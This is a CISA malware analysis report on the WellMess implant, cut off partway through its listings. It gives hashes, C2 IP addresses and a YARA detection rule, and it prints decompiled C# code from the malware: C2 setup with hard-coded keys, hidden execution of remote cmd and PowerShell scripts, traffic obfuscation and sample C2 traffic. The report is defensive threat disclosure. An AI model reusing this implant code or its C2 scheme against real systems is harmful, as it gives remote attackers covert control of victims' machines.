Malware Analysis Report (AR20-198B)

MAR-10296782-2.v1 – WELLMESS

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

The Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA). This malware has been identified as WELLMESS. Advanced persistent threat (APT) groups have been identified using this malware. For more information regarding this malware, please visit: https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development

This report analyzes six unique files. The files are variants of the malware family known as "WellMess". These implants allow a remote operator to establish encrypted command and control (C2) sessions and to securely pass and execute scripts on an infected system.

The WellMess samples include one 32-bit Windows executable and five Executable and Linkable Format (ELF) files written in Go, an open source programming language. The report includes analysis of a compiled .NET application extracted from one of the 32-bit Windows executables.

The ELF and 32-bit Windows executables have similar functionality; both collect the state of system privileges (disabled or enabled) from the infected system and encrypt the data via a Rivest cipher 6 (RC6) algorithm, then dynamically generate Advanced Encryption Standard (AES) keys, which are exchanged via a Rivest–Shamir–Adleman (RSA) secured key transfer scheme. Both versions also allow an operator to pass AES encrypted executable scripts to infected systems.

For a downloadable copy of IOCs, see MAR-10296782-2.v1.stix.

Submitted Files (6)

14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2 (14e9b5e214572cb13ff87727d68063...)

5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb (5ca4a9f6553fea64ad2c724bf71d0f...)

7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee (7c39841ba409bce4c2c35437ecf043...)

953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a (953b5fc9977e2d50f3f72c6ce85e89...)

e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09 (e329607379a01483fc914a47c0062d...)

fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950 (fd3969d32398bbe3709e9da5f83269...)

Additional Files (1)

47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 (WellMess.net.extract.bin)

IPs (5)

103.73.188.101

141.98.212.55

192.48.88.107

209.58.186.196

85.93.2.116

Findings

953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a

Tags

trojan

Details
Name 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a
Size 172032 bytes
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 f18ced8772e9d1a640b8b4a731dfb6e0
SHA1 92f7b470c5a2c95a4df04c2c5cd50780f6dbdda1
SHA256 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a
SHA512 c4ac5332ee27b3da002c8a55a1e99aefeb503a69b8eb1ce9310bcb12131d56d2efe70f50942461ec9e7c628e3d1a5f13c92faa6bb6b1c263acbe4a1af977ad50
ssdeep 1536:Lo7PHWHfGE50u3J0cMuNJdbOYOL68q4ATMMx4pnMgqZ5C/yOCy2UpiPKsNoeIlnt:E7PHwJdbJOOvkuC/yOH2CiP0ie1XF
Entropy 3.887546
Antivirus
BitDefender Gen:Variant.Razy.279280
ClamAV Win.Trojan.WellMess-6706033-0
Emsisoft Gen:Variant.Razy.279280 (B)
McAfee GenericRXEI-SR!F18CED8772E9
NANOAV Trojan.Win32.WellMess.fignvr
Quick Heal Trojan.Wellmess
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = "CISA Code & Media Analysis"
        Date= "2020-07-06"
        Last_Modified="20200706_1017"
        Actor="n/a"
        Category="Trojan"
        Family="WellMess"
        Description = "Detects WellMess implant and SangFor Exploit"
        MD5_1 = "4d38ac3319b167f6c8acb16b70297111"
        SHA256_1 = "7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee"
        MD5_2 = "a32e1202257a2945bf0f878c58490af8"
        SHA256_2 = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
        MD5_3 = "861879f402fe3080ab058c0c88536be4"
        SHA256_3 = "14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2"
        MD5_4 = "2f9f4f2a9d438cdc944f79bdf44a18f8"
        SHA256_4 = "e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09"
        MD5_5 = "ae7a46529a0f74fb83beeb1ab2c68c5c"
        SHA256_5 = "fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950"
        MD5_6 = "f18ced8772e9d1a640b8b4a731dfb6e0"
        SHA256_6 = "953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a"
        MD5_7 = "3a9cdd8a5cbc3ab10ad64c4bb641b41f"
        SHA256_7 = "5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb"
        MD5_8 = "967fcf185634def5177f74b0f703bdc0"
        SHA256_8 = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
        MD5_9 = "c5d5cb99291fa4b2a68b5ea3ff9d9f9a"
        SHA256_9 = "65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75"
        MD5_10 = "01d322dcac438d2bb6bce2bae8d613cb"
        SHA256_10 = "0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494"
        MD5_11 = "8777a9796565effa01b03cf1cea9d24d"
        SHA256_11 = "83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18"
        MD5_12 = "507bb551bd7073f846760d8b357b7aa9"
        SHA256_12 = "47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854"
    strings:
        $0 = "/home/ubuntu/GoProject/src/bot/botlib/chat.go"
        $1 = "/home/ubuntu/GoProject/src/bot/botlib.Post"
        $2 = "GoProject/src/bot/botlib.deleteFile"
        $3 = "ubuntu/GoProject/src/bot/botlib.generateRandomString"
        $4 = "GoProject/src/bot/botlib.AES_Decrypt"
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = "get_keyRC6"
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = "GoProject/src/bot/botlib.wellMess"
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-28 07:14:10-04:00
Import Hash f34d5f2d4577ed6d9ceec516c1f5a744
Company Name Microsoft Corporation
File Description Power Settings Command-Line Tool
Internal Name powercfg.exe
Legal Copyright © Microsoft Corporation. All rights reserved.
Original Filename powercfg.exe
Product Name Microsoft® Windows® Operating System
Product Version 6.1.7600.16385 (win7_rtm.090713-1255)
PE Sections
MD5 Name Raw Size Entropy
b90f84adffd98c3c63291dc54f766f18 header 4096 0.462120
25e1daba00e54a31c1d9bb459988f669 .text 159744 4.056043
bb5030c93de573a2819699404e0436be .rsrc 4096 2.256683
f662c2f95c916d5bd4f0c939236a81e9 .reloc 4096 0.016408
Packers/Compilers/Cryptors
Microsoft Visual C# v7.0 / Basic .NET
Relationships
953b5fc997... Created 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854
Description

This file is a malicious compiled .NET application. It decrypts and loads an embedded dynamic link library (DLL) "WellMess.net.extract.bin" (47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854).

Screenshots
Figure 1 - Screenshot of the code structure which decrypts the embedded DLL.

Figure 1 - Screenshot of the code structure which decrypts the embedded DLL.

47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854

Tags

trojan

Details
Name WellMess.net.extract.bin
Size 45056 bytes
Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 507bb551bd7073f846760d8b357b7aa9
SHA1 23033dcad2d60574ea8a65862431f46b950e54c3
SHA256 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854
SHA512 fbad8f6e4c2a49ad7e030bfc069b830027942383a5429ac129ba4880c7f90d9e1ec84186755cbb61c39b41096d7969fa5e1e7a13918d1677045fb52f0fa70c7f
ssdeep 768:vLTf79aYYuGhmohyWdDZo/G9sklJL+9Ok/JSbrvfMAQ:/fMtYG9PB+9OyYXHhQ
Entropy 4.625315
Antivirus

No matches found.

YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = "CISA Code & Media Analysis"
        Date= "2020-07-06"
        Last_Modified="20200706_1017"
        Actor="n/a"
        Category="Trojan"
        Family="WellMess"
        Description = "Detects WellMess implant and SangFor Exploit"
        MD5_1 = "4d38ac3319b167f6c8acb16b70297111"
        SHA256_1 = "7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee"
        MD5_2 = "a32e1202257a2945bf0f878c58490af8"
        SHA256_2 = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
        MD5_3 = "861879f402fe3080ab058c0c88536be4"
        SHA256_3 = "14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2"
        MD5_4 = "2f9f4f2a9d438cdc944f79bdf44a18f8"
        SHA256_4 = "e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09"
        MD5_5 = "ae7a46529a0f74fb83beeb1ab2c68c5c"
        SHA256_5 = "fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950"
        MD5_6 = "f18ced8772e9d1a640b8b4a731dfb6e0"
        SHA256_6 = "953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a"
        MD5_7 = "3a9cdd8a5cbc3ab10ad64c4bb641b41f"
        SHA256_7 = "5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb"
        MD5_8 = "967fcf185634def5177f74b0f703bdc0"
        SHA256_8 = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
        MD5_9 = "c5d5cb99291fa4b2a68b5ea3ff9d9f9a"
        SHA256_9 = "65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75"
        MD5_10 = "01d322dcac438d2bb6bce2bae8d613cb"
        SHA256_10 = "0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494"
        MD5_11 = "8777a9796565effa01b03cf1cea9d24d"
        SHA256_11 = "83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18"
        MD5_12 = "507bb551bd7073f846760d8b357b7aa9"
        SHA256_12 = "47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854"
    strings:
        $0 = "/home/ubuntu/GoProject/src/bot/botlib/chat.go"
        $1 = "/home/ubuntu/GoProject/src/bot/botlib.Post"
        $2 = "GoProject/src/bot/botlib.deleteFile"
        $3 = "ubuntu/GoProject/src/bot/botlib.generateRandomString"
        $4 = "GoProject/src/bot/botlib.AES_Decrypt"
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = "get_keyRC6"
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = "GoProject/src/bot/botlib.wellMess"
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-27 09:22:21-04:00
Import Hash dae02f32a21e03ce65412f6e56942daa
Company Name Microsoft Corporation
File Description  
Internal Name x643.Microsoft.Dtc.PowerShell.dll
Legal Copyright Copyright (c) Microsoft Corporation. All rights reserved.
Original Filename x643.Microsoft.Dtc.PowerShell.dll
Product Name Microsoft (R) Windows (R) Operating System
Product Version 10.0.14393.0
PE Sections
MD5 Name Raw Size Entropy
668481e5e1971f610581ea0b01b617b5 header 4096 0.434226
ced7014e20c39fba49386f6aef5e1203 .text 32768 5.701312
1d4922f19bd3e79cfdf93cd91be7af27 .rsrc 4096 1.150437
da55cd9f0f50ad5c82000ca03bfaa4be .reloc 4096 0.013127
Packers/Compilers/Cryptors
Microsoft Visual C# v7.0 / Basic .NET
Relationships
47cdb87c27... Connected_To 85.93.2.116
47cdb87c27... Created_By 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a
Description

This file is a compiled .NET application. It has been identified as a variant of the WellMess malware family. Displayed below is a function named “HXYGVr()” which was extracted from this application:

—Begin Extracted Function—
public void HXYGVr()
   {
    Variable.url = "hxxp[:]//85.93.2.116";
    string Address = "";
    Variable.proxy = !string.IsNullOrEmpty(Address) ? new WebProxy(Address) : (WebProxy) null;
    Variable.serverType = "GO";
    Variable.userAgent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0";
    Variable.maxPostSize = 5000000;
    Variable.keyRC6 = "UJqqarUGKm1kR1mQMf5K2g==";
    Key publicKey;
    publicKey.keySize = 2048;
    publicKey.publicKey = "<RSAKeyValue><Modulus>4Dy24gTFNYA/jq6SYiAkdRvY1ieWqM9R8dwo0uL+4GzaRObZEoUaZSHhvfeD1v762+duL1LgAcuXJeRg4PB4cGdpZqjKtB2BKIDJv3h2GNad8OsQiNY9b7Pr1Wrm2VsuS77higj0o82IWqpr4VYLaRQB1mY463WPfMv9kuOmYTSAkvw42qo1P9ud5pPptRfVUHfn0xT4idhxfAsVvb0Dm4iJDvk2Lt4op07aIyzoMPvv4ByE68xx6LoMfvu/hDby6gnHb//94lUGXSJbsEDL26DgYXH6zUooRAFZA1aFr/MonJaLRUuZLycXeSiAXDk3hglhNfH7s+ru7QEnAoTrRQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>";
    Variable.interval = 12.0;
    if (!this.IsInit)
    {
       Init init = new Init(publicKey);
       this.Hash = Variable.hash;
       this.Skey = Variable.keySymm;
       this.IsInit = true;
       this.Ua = Variable.userAgent;
       this.MaxPostSize = Variable.maxPostSize;
       this.HealthInterval = Variable.interval;
    }
    else
    {
       Variable.hash = this.Hash;
       Variable.keySymm = this.Skey;
       Variable.userAgent = this.Ua;
       Variable.maxPostSize = this.MaxPostSize;
       Variable.interval = this.HealthInterval;
       Dictionary<string, string> segmentsMessage = Chat.Download(Variable.hash, "rc", string.Empty);
       if (segmentsMessage["head"] == "G")
       {
        this.Complete = true;
        if (!this.Hx)
           return;
        Chat.Send(Encoding.UTF8.GetBytes("Missed me?"), Variable.keySymm, Variable.hash + "/h", "a", "h", Variable.maxPostSize);
       }
       else if (segmentsMessage["head"] == "C")
       {
        new Chunks().Join((object) new ChatParameters()
        {
           segmentsMessage = segmentsMessage
        });
        this.Complete = false;
        Thread.Sleep(20000);
       }
       else if (segmentsMessage["service"] == "p")
       {
        Init init = new Init(publicKey);
        this.Hash = Variable.hash;
        this.Skey = Variable.keySymm;
        this.Complete = false;
       }
       else
       {
        new Choise().Work(segmentsMessage);
        this.Complete = false;
        this.Ua = Variable.userAgent;
        this.MaxPostSize = Variable.maxPostSize;
        this.HealthInterval = Variable.interval;
       }
    }
—End Extracted Function—

This function appears to be the main export of the DLL, which initiates a C2 session with the implants remote C2 server at the Internet Protocol (IP) address, 85.93.2.116. Contained within the function is a public RSA key utilized by the malware to secure communication with its C2 server. The function also contains an RC6 cryptographic key, which is utilized to secure state information within the C2 sessions, such as a unique hash value which is generated to identify the unique target system.

The malware accepts and executes PowerShell and batch scripts from a remote operator on the infected system. These executable scripts will be provided within a C2 session that is secured with AES encryption. In addition, the AES key transfer process between the implant and the remote operator will be encrypted utilizing RSA asymmetric cryptography making the detection of malicious executable code traveling over the network difficult to detect. The function which provides the script execution capability is illustrated below. Note: the execution of a script using this method will result in a separate malicious process:

—Begin Command Function—
public void Command(object message)
   {
    ChatParameters chatParameters = (ChatParameters) message;
    try
    {
       string s = string.Empty;
       Match match = new Regex("fileName:(?<fn>.*?)\\sargs:(?<arg>.*)\\snotwait:(?<nw>.*)", RegexOptions.IgnoreCase | RegexOptions.Multiline | RegexOptions.Singleline).Match(chatParameters.segmentsMessage["body"]);
       string str1 = match.Result("${fn}").ToString();
       string script = match.Result("${arg}").ToString();
       string str2 = match.Result("${nw}").ToString();
       Process process = new Process();
       ProcessStartInfo processStartInfo = new ProcessStartInfo();
       processStartInfo.CreateNoWindow = true;
       processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
       processStartInfo.UseShellExecute = false;
       processStartInfo.RedirectStandardOutput = true;
       processStartInfo.FileName = str1;
       if (str1 == "powershellScript")
       {
        s = BotChat.Pshell(script);
       }
       else
       {
        if (!string.IsNullOrEmpty(script))
           processStartInfo.Arguments = !(str1 == "cmd.exe") ? script : "/c " + script;
        process.StartInfo = processStartInfo;
        process.Start();
        if (string.IsNullOrEmpty(str2))
        {
           s = process.StandardOutput.ReadToEnd();
           process.WaitForExit();
        }
       }
       process.Close();
       this.Reply(Encoding.UTF8.GetBytes(s), chatParameters.segmentsMessage["head"], chatParameters.segmentsMessage["service"]);
    }
    catch (Exception ex)
    {
       this.Reply(Encoding.UTF8.GetBytes(ex.Message.ToString()), chatParameters.segmentsMessage["head"], chatParameters.segmentsMessage["service"]);
       Thread.Sleep(1000);
    }
   }
—End Command Function—

The implant can also run PowerScripts scripts directly from memory. The malware contains the following function providing this capability. Note: executing a PowerShell script using this method will not result in a separate malicious process.

—Begin PowerShell Function—

private static string Pshell(string script)
   {
    string empty = string.Empty;
    Collection<PSObject> collection;
    using (Runspace runspace = RunspaceFactory.CreateRunspace())
    {
       try
       {
        runspace.Open();
        using (PowerShell powerShell = PowerShell.Create())
        {
           powerShell.Runspace = runspace;
           ScriptBlock scriptBlock = ScriptBlock.Create(script);
           powerShell.AddCommand("Invoke-Command").AddParameter("ScriptBlock", (object) scriptBlock);
           collection = powerShell.Invoke();
        }
       }
       finally
       {
        runspace.Close();
       }
    }
    foreach (PSObject psObject in collection)
       empty += psObject.ToString();
    return empty;
   }
—End PowerShell Function—

Displayed below is sample communication traffic between this WellMess implant and its C2 server.

—Begin Sample Network Traffic—
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Language: en-US,en;q=0.8
Cookie: 4NJZrNBl=80WOGU+5py+Cq0GVi+JMiq6ka+x%3aGeT+%3a7jpfqo+q1%3aa+6j9Delt+yDQ+SpTmS5+T5TpR.+DwUNdr+gjsJf+svT+Byw+sysM.+AP9LC+Rtsol+Fkj15U3+1Gke+%2c%2cAM.+6eaJV+h0tJ%2ci+sjhfQt7+EmI;F5R1hdiM=A+YDy%2cab.+GI65+lRmzt+EF7lLr4+QZB+LQmBR.+f84+tVTX0z+6WMLc+++
Host: 85.93.2.116
Content-Length: 798
Expect: 100-continue
Accept-Encoding: deflate
Connection: Keep-Alive

PXYaTG AoW 0gVV4R xKRORQU em5Jz OqxrlVM PweS oOVI30A 1oZ OgLqNp JyA1q. Dos2gp N0c3C q:d tKX IdNx. zkTbV QmOjB HXU::fP eUN4 jBOI. RlCFb xOTaSL C0k:BKg EGVy fsoDDZ. arfb ,2fvY xYlkGpW ,D6 ikXZ6. kJT 6N82Au ,2Uf t7mOYW9 DLyAy. CF60ZX TIswg X7XBA: E6Xj2a unGhGIR. fir 1rH1jkG QPEc t1I53 iED. aomEaY n84rKx ECxZ0K yeDLh4 suZyqzp. ITxjQq b58:jvm lsOT AC,o mlM1. V3oUd U6bU:y8 WzJ8t pWUN76I KxnVY3. uUTz,K jDK qba yqU 1AvBN. pVg 3Duu 34IA g9jZc pr77J. 0h8lQGU lm3ReWd F2SB 7Yes fk1J. ndl8o tpzJ NhXH bjNO 8nm:Aqm. l0HHBo dOypefA hja IAQ ,NUHFF7. yt, F:Gp OU1 S3e4GZ NU7HvZW. hAINPwR kDCE2Ev cQiiXU TXY Kpt. prnvUns el4sMa 9do tw: eisS58C. d2wKh :T0F kxk mZTI jU1. 4y:Y6l YQgZ6t 0uANCK2 UpHCRc2 cbgnSm. UFu k:cIT cBH5 Fxk 2Jk. ErKKHod 0dgeQ5e 7MV 8PH0 tsUn. dMd,glf x3Q ZpNEDt FnvMxh IM:p:. lbabsz3EA    
—End Sample Network Traffic—

Contained within the “Cookie:” section of the data is simple session information, including a hash that is unique to the target system. The unique hash generated from the target system is computed by calculating the SHA256 hash of various pieces of information about the victim system pieced together into a single string (Figure 2). These pieces of information include the computer name, session name, computer name, and user domain.

This data is RC6 encrypted with a hard-coded key and then Base64 encoded. This Base64 encoding is then encoded with the following algorithm which generates slightly modified Base64 data that appears to contain spaces between different parts of the original Base64 encoded data:

—Begin FromBase64ToNormal Function—
public static string FromBase64ToNormal(string base64Str)
   {
    int num1 = 0;
    int length1 = base64Str.Length;
    string str1 = base64Str.Replace("=", " ");
    base64Str = string.Empty;
    string str2 = str1.Replace('+', ',');
    string empty1 = string.Empty;
    string str3 = str2.Replace('/', ':');
    string empty2 = string.Empty;
    StringBuilder stringBuilder = new StringBuilder();
    int length2 = str3.TrimEnd().Length;
    Random random = new Random();
    int startIndex = 0;
    while (startIndex < length2 - 9)
    {
       int length3 = random.Next(3, 8);
       int num2 = startIndex + length3;
       if (num1 > 5 && num1 % 5 == 0)
        stringBuilder.Append(str3.Substring(startIndex, length3) + ". ");
       else
        stringBuilder.Append(str3.Substring(startIndex, length3) + " ");
       startIndex = num2;
       ++num1;
    }
    stringBuilder.Append(str3.Substring(startIndex));
    string empty3 = string.Empty;
    return stringBuilder.ToString();
   }
—End FromBase64ToNormal Function—

The newly encoded string is then broken into two separate parts. The split in the string happens at a random offset (Figure 3). The two new parts of the string are then prepended with random strings followed by an “=“ character. Both of the strings are then Uniform Resource Locator (URL) encoded.

Upon execution, the malware generates an AES key which will be used during C2 sessions. This key is generated via the following function:

—Begin AES Key Generation Function—
public static Dictionary<string, byte[]> GenerateSymmKey()
   {
    Dictionary<string, byte[]> dictionary = new Dictionary<string, byte[]>();
    byte[] hash = SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(Membership.GeneratePassword(16, 4)));
    byte[] randomBytes = GenerateKeys.GetRandomBytes(8);
    using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
    {
       rijndaelManaged.KeySize = 256;
       rijndaelManaged.BlockSize = 128;
       Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(hash, randomBytes, 1000);
       rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
       rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
       dictionary.Add("Key", rijndaelManaged.Key);
       dictionary.Add("IV", rijndaelManaged.IV);
    }
    return dictionary;
   }
—End AES Key Generation Function—

The malware also contains the following hard-coded public RSA key:

—Begin Pub RSA Key—
<RSAKeyValue><Modulus>4Dy24gTFNYA/jq6SYiAkdRvY1ieWqM9R8dwo0uL+4GzaRObZEoUaZSHhvfeD1v762+duL1LgAcuXJeRg4PB4cGdpZqjKtB2BKIDJv3h2GNad8OsQiNY9b7Pr1Wrm2VsuS77higj0o82IWqpr4VYLaRQB1mY463WPfMv9kuOmYTSAkvw42qo1P9ud5pPptRfVUHfn0xT4idhxfAsVvb0Dm4iJDvk2Lt4op07aIyzoMPvv4ByE68xx6LoMfvu/hDby6gnHb//94lUGXSJbsEDL26DgYXH6zUooRAFZA1aFr/MonJaLRUuZLycXeSiAXDk3hglhNfH7s+ru7QEnAoTrRQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
—End Pub RSA Key—

The encrypted portion of the callout in the main body of the POST is the dynamically generated AES key encrypted with the hard-coded RSA public key. The following function is utilized to conduct the initial C2 connection to the C2 server. The “Message” variable argument will contain the dynamically generated AES key encrypted utilizing the embedded RSA public key.

—Begin SendMessage Function—
public void SendMessage(string Message, string idMess, string askOrReply, string service)
   {
    TransportProtocol transportProtocol = new TransportProtocol();
    string message = transportProtocol.FullMessage(idMess, askOrReply, service);
    string service1 = new RC6(Convert.FromBase64String(Variable.keyRC6), Variable._serverType).Encrypt(message);
    Dictionary<HttpStatusCode, List<string>> dictionary = transportProtocol.Post(Message, service1, true);
    for (int index = 0; !dictionary.ContainsKey(HttpStatusCode.OK) && index < 3; ++index)
